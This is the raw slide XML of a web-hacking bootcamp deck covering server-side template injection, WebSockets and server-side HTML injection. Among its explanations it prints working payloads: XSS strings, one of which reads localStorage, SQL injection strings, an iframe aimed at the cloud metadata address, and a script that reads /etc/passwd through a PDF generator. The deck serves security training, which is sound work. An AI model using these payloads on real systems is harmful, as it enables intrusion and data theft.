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67" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="369" r:id="rId4"/>
    <p:sldId id="380" r:id="rId5"/>
    <p:sldId id="371" r:id="rId6"/>
    <p:sldId id="372" r:id="rId7"/>
    <p:sldId id="370" r:id="rId8"/>
    <p:sldId id="368" r:id="rId9"/>
    <p:sldId id="373" r:id="rId10"/>
    <p:sldId id="374" r:id="rId11"/>
    <p:sldId id="375" r:id="rId12"/>
    <p:sldId id="378" r:id="rId13"/>
    <p:sldId id="379" r:id="rId14"/>
    <p:sldId id="377" r:id="rId15"/>
    <p:sldId id="376" r:id="rId16"/>
    <p:sldId id="381" r:id="rId17"/>
    <p:sldId id="383" r:id="rId18"/>
    <p:sldId id="382" r:id="rId19"/>
    <p:sldId id="385" r:id="rId20"/>
    <p:sldId id="386" r:id="rId21"/>
    <p:sldId id="1091" r:id="rId22"/>
    <p:sldId id="387" r:id="rId23"/>
    <p:sldId id="388" r:id="rId24"/>
    <p:sldId id="389" r:id="rId25"/>
    <p:sldId id="390" r:id="rId26"/>
    <p:sldId id="391" r:id="rId27"/>
    <p:sldId id="1092" r:id="rId28"/>
    <p:sldId id="10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9203" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="10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7638-1A5B-4213-80E7-C585DBCBA414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CDB2-32DF-46F5-B558-3CF2272A102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865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42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Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>The server processes the injected HTML, leading to Internal data exposure or phishing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90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215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are running a massive bakery that sells thousands of "Happy Birthday" cakes every day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you had to hand-write every single person's name on every single cake from scratch, you’d be exhausted and make mistakes. Instead, you use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>stencil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64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sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Software tools or frameworks that create dynamic contents by combining templates with data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Generate dynamic web pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="var(--font-suisse-intl)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="var(--font-suisse-intl)"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="var(--font-suisse-intl)"/>
              </a:rPr>
              <a:t>Twig and Smarty for PHP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var(--font-suisse-intl)"/>
              </a:rPr>
              <a:t>Jinja for Python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var(--font-suisse-intl)"/>
              </a:rPr>
              <a:t>Jade for JavaScript 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var(--font-suisse-intl)"/>
              </a:rPr>
              <a:t>Velocity for Java</a:t>
            </a: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__Inter_d9825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3E72A-365B-46BD-943A-CE33ADDF3B1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6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9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Definition:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Server-Side Template Injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed on the server side.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630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known as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Polyglot Fuzz String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Its purpose is to trigger an error or a change in the page's response by including characters that are "special" to almost every major template engine.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15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0625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2123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Continue with payload understanding and look for the slide 26.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21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are at a restaurant, but the waiter is not allowed to come to your table unless you scream "WAITER!"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>You:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> "Waiter! Can I have water?" -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Waiter:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Brings water -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Waiter leaves.</a:t>
            </a:r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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. The client (you) must always initiate the request. The server (waiter) cannot speak to you unless you ask first, and the connection closes after every single interaction.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76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it Works (The Technical Steps)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WebSockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> actually start as a regular HTTP request, but they "handshake" and upgrade to a permanent connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The Handshake:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> The browser sends a request to the server saying, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>"Hey, can we talk over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>WebSockets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> instead of HTTP?"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The Upgrade:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> If the server agrees, it sends back a "101 Switching Protocols" response.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The Open Line:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> The connection is now "Full-Duplex." This means the server can send data to the browser without being asked, and the browser can send data to the server simultaneously.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Closing:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> The connection stays open until either the user closes the tab or the server cuts the line.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44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98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450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for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>websockets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XSS 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=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='alert('1')'&gt;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onerror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='alert(1)'&gt;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=invalid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt;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=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>btoa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JSON.stringify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)))&gt;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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' UNION SELECT username, NULL, NULL, NULL FROM USERS -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' OR 1=1 -- </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' ORDER BY 4 --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79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79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PDF Invoice Generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many web apps allow users to download a PDF of their profile or an invoice. The server often uses a library (like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wkhtmltopdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to convert an HTML template into a PDF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The Trap:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> If a user changes their "Company Name" to &lt;u&gt;My Company&lt;/u&gt;, the PDF might show the name underlined.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The Exploit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> An attacker changes their name to an iframe: &lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://169.254.169.254/latest/meta-data/"&gt;&lt;/iframe&gt;. When the server generates the PDF, it might fetch its own internal metadata and print it directly onto the document for the attacker to see.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50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Automated Email Notifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Think of a "Contact Us" form that sends an email to an admin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The Trap:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> If the email is sent as HTML and doesn't sanitize the "Subject" or "Message" field.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The Exploit:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> An attacker sends a message containing &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://malicious-phishing-site.com"&gt;Click here to login and view message&lt;/a&gt;. The admin receives a perfectly formatted, official-looking email from their own server that contains a phishing link.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8CDB2-32DF-46F5-B558-3CF2272A102D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3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4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381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624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29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84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8966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931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61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23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316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21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3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57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24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0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563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54E7A-685F-44E4-B1CE-8A9D1EA03F9A}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>30-01-2026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BFAB-C61B-483F-816E-F26ACFE43C4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046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1D48-7080-88E3-7F3B-BE32B01E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776A-8D4F-6D35-35AE-CDC00AE1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9C006-D5ED-5140-286E-D9E77002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27" y="-207819"/>
            <a:ext cx="12360442" cy="8768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BDB7AF-B676-171A-E34F-5B45C260B40B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2176333" y="4697815"/>
            <a:ext cx="8144134" cy="137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Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Web Hacking Extreme Bootcamp</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4800" b="1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796000-55ED-8747-6F11-6E840BD5C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2897098"/>
            <a:ext cx="8346936" cy="137307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>
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Server-Side Template Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:latin typeface="Nunito Sans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352100-CE70-1B32-C946-2C2FD5BE4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4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28D3262C-26E4-34DD-A4D2-13F36ECB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023" y="2647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4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317F-8212-0E95-C387-AB67AEAB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Server-Side HTML Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E6DEB6-F617-ECB1-1E7F-3D3FF833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A1CF8-BDC4-4F69-B308-DE6F54C3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Nunito Sans"/>
              </a:rPr>
              <a:t>In SSHI, the "injection" happens because the server takes user input and embeds it into an HTML document (like a PDF generator or an email template) that is rendered or processed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>on the server itself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>, rather than just in the victim's browser. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Nunito Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>The Key Difference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>Client-Side (XSS):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t> The malicious script executes in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>user's browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans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latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>Server-Side (SSHI):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t> The malicious HTML is processed by a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>server-side tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t> (like a PDF engine or an automated mailer).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"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7363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FA89F-13C1-4ED1-B0A4-150B7A053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5" b="15989"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="572036" y="2213810"/>
            <a:ext cx="10701234" cy="4235116"/>
          </a:xfrm>
          <a:prstGeom prst="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C8FC5C3-1796-4D2A-8ABA-F60B96C8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SSHI: PDF Generator Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{372832FB-72CB-44B2-8ECF-D0FFFBCA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2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AF6EA-C531-4240-B9AD-643E65CD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 b="8931"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193562" y="2261936"/>
            <a:ext cx="9265920" cy="4206240"/>
          </a:xfrm>
          <a:prstGeom prst="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719317-F738-4236-870A-CDEBFF95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SSHI: Email Form </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85586B77-892C-4D42-91E0-2FAE8CC6F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4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ED88-3306-4867-B03D-B7C7576C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Identify the SSHI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33355C-4FB8-41F2-88A1-04500A07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336800"/>
            <a:ext cx="9613900" cy="3598863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Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Finding Server-Side HTML Injection (SSHI) requires looking for features where your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>input is stored or processed by the server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> and subsequently rendered back into a page viewed by yourself or others.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Because the server is responsible for building the final HTML string, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>you should focus on any functionality that acts as a "content creator" or "profile builder."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>The main difference lies in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>where the injection is rendered. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 2" descr="Image of ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7756910-DD12-4B4A-A2F7-8436526C3D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https://lh3.googleusercontent.com/gg-dl/AOI_d_-wLTeoS_5Rpe978f1JUHUs7fEJq8OpqEcWf1UEfdk_BTbqv15LdTcjsihseXiF5Lv-wq-MWU67bj2OvuUAb5WOs0JkmfNKWwfm10IaaUu6SL_U6ZYLPy5mtwiyF4BbaVuyp18-WsYP0VGWN9cE0sXVehG2z6XsPJ4FoZipl0mlrPnZog=s1024-rj">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC34ADAD-0C4E-409A-BE76-47CB78016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60105" y="3705726"/>
            <a:ext cx="2923674" cy="29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1C3F0-E544-4718-8EE5-9E2B1072F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6" y="2814538"/>
            <a:ext cx="8530389" cy="4418593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFA0B89-D6C0-4097-ABBA-3318CDB6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64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261E-86BA-2A65-91E3-62AC115D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Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SSHI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Client-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Nunito Sans" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0">
              <a:latin typeface="Nunito Sans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571264-D49D-3B8E-4DB7-C451F434D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434308"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="397605" y="2499360"/>
          <a:ext cx="10026555" cy="3749040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1416255">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4173397550"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4404782">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2011658605"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4205518">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="114572286"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="528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Feature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Client-Side (Traditional XSS)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Server-Side (SSHI)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17355"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="528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Execution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Occurs in the victim's browser via JavaScript.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Occurs on the server during page generation.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553999"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8976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Data Flow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The browser receives a script and executes it locally.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The server builds a "corrupted" HTML file and sends it.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447585"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8976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Primary Goal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Steal cookies, session tokens, or perform actions as the user.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Deface the site, phish users, or exfiltrate data from the server.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9422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8976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Persistence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Often temporary (Reflected) or in a database (Stored).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Integrated into the application's response logic.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965884"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Join Redfox Security: Exciting Career Opportunities Await">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{822C5A61-AAA3-4BB2-8829-EB447BED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B728-2B67-4C18-B6BF-AE872885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60AA-2C78-4A65-9EA9-3FBBC8E6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015753" cy="3599316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>When no Filter is implemented.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>&lt;script&gt;x = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>x.onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t> = function(){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>this.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>)};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>x.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>("GET", "file:///etc/passwd");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
